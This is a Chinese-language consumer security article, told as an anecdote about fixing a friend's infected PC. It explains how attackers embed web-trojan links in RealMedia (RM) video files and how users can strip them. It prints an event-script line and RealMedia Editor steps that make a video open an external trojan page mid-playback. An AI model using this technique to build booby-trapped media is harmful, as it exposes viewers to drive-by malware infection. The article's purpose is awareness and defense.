五一期間,到處都人滿為患,我還是選擇在家度過不長不短的七天長假,其實和我有同樣安排的人有很多,比如佳佳MM就是如此。為了緩解前段時間工作的壓力,她打算安安靜靜地呆在家裏哪也不去,準備和各種各樣的大片一同度過,正所謂“五一七天樂,在家也快樂”。www.sq120.com推薦文章
五一剛過了兩天,第三天一大早醒來,我突然接到了佳佳MM的求助電話。“東渝哥哥,我想給你商量一件事,今天中午我請你吃飯好嗎?”這樣一句話使得躺在床上的我以為自己在做夢,連掐了自己幾下。“難道是鴻門宴!要知道以前我請她吃飯,都不肯賞臉,今天居然請我吃飯,一定是有求於我。”果然不出所料,在吃飯的時候,佳佳MM說自己的系統可能中了木馬程式,讓他幫忙看看。
吃人嘴短,沒有辦法,吃完飯後我來到MM家裏。在認真查看了系統的進程後,發現一個可疑的“iexplore.exe”進程。“這不是IE流覽器的進程嗎,我沒有運行啊,怎麼會有這個進程呢?”我的心中泛起了疑惑,“看來你的系統一定是中了某種木馬程式,IE流覽器是被它調用的。”
“我這幾天除了下載了三部電影,什麼也沒有下載啊!”MM說道。於是我對這三部電影進行檢查,發現果然不出所料,裏面有一些奇怪的鏈接。看來是中了網頁木馬,這個簡單,找到這個網頁,然後對症下藥,清除掉系統中的木馬。
“看幾部電影就會中木馬?”佳佳MM不解地問道。“你不是說只有RealPlayer播放器的用戶才會中木馬的嗎?我用的可是MPC啊,怎麼也中木馬了呢?”我只好解釋:“以前是只有RealPlayer播放器才能中網頁木馬的,可現在的入侵方法日新月異,簡直是防不勝防啊。正好今天有空,給你露一手,看看入侵者如何在RM檔中加入惡意代碼的。”說做就做,馬上動手給MM演示。
再現RM木馬惡作劇
“由於RM檔是網路上最常用的多媒體檔類型之一,所以通過這種方法進行網頁木馬的傳播,可以讓受危害的用戶面更加的廣。其實這種方法最早是用於傳播網路廣告的,而現在已經被入侵者利用,並且給普通的RM檔加入網頁木馬的鏈接的操作也並不複雜,通過一些現成的工具就可以完成,比如Helix Producer Plus、RealMedia Editor。”我給MM先介紹一下。
“首先要準備一個RM視頻檔作為網頁木馬傳播的原材料,最好有一些吸引人的內容,不然受害者就不會觀看到木馬觸發的那個時間段。另外還有一個好處就是,當用戶津津有味地觀看電影的時候,是不會在乎彈出的網頁的。”我補充了一下。
我首先打開記事本程式,新建一個文本檔,在上面輸入下麵一段代碼,然後將其保存為mm.txt:
u 00:00:20.0 00:00:30.0 &&_rpexternal&&http://www.cpcw.com/test.htm
我來解釋一下這段代碼的意思。其中u是事件標誌(Flag),表示要在檔中插入的是一個URL地址。接著第三個字段表示起止時間點,單位格式是“小時:分:秒.毫秒”,最後一個字段是你要彈出的URL的地址,“ _rpexternal”參數表示在外部流覽器打開URL,而不是使用缺省的Realplayer內嵌的流覽器打開URL。這裏表明當播放到第20秒或者將播放進度拖到第20秒至30秒之間的任意時間時,RM檔都會自動調用系統默認的流覽器打開“http://www.cpcw.com/test.htm”的這個網頁鏈接,從而將木馬程式安裝到用戶的系統中。
接著我運行RM視頻檔編輯工具RealMedia Editor,點擊“檔”菜單下的“打開Real媒體檔”命令來打開先前準備好的那段正常的RM視頻檔,然後點擊“工具”菜單下的“合併事件”命令,選擇剛才保存的那個文本檔。最後點擊“檔”菜單下的“RealMedia檔另存為”命令,將它另存為一個全新的RM檔,這樣一個攜帶了網頁木馬的RM檔就製作完成了。
為MM支招
對於這種惡意的RM檔的防範,不同的情況可以採用不同的方法。對於那些可以下載到硬碟中的RM檔,我們可以通過一款名為“Real 媒體篩檢程式”的軟體對可疑的RM檔進行處理,將其中可能包含的一些外加的網頁鏈接和特效去除掉。運行“Real 媒體篩檢程式”,在“原始檔案”和“另存為”選項後進行相應的設置,然後點擊“開始過濾”按鈕就可去除可疑RM檔中的多餘鏈接(如圖2)。過濾完成後,程式會彈出一個對話框並提示過濾的內容。
另外,如果用戶使用MPC進行播放的話,可以把Real媒體檔的解碼類型設置為DirectShow即可,因為使用DirectShow格式可以自動遮罩掉這些廣告。但因為RM檔是Real公司的獨家格式,所以DirectShow格式對於一些特殊的RM檔不能解碼。這時就只有使用RealMedia格式進行播放了,但自動遮罩廣告的功能將失效。
最後提醒廣大可愛的MM,及時到微軟網站去下載最新的安全補丁,堵住系統以及軟體的漏洞;安裝最新的反病毒軟體並及時更新病毒庫;安裝網路防火牆,封堵不需要的端口,並對試圖連接互聯網的進程進行認真的篩選。 |
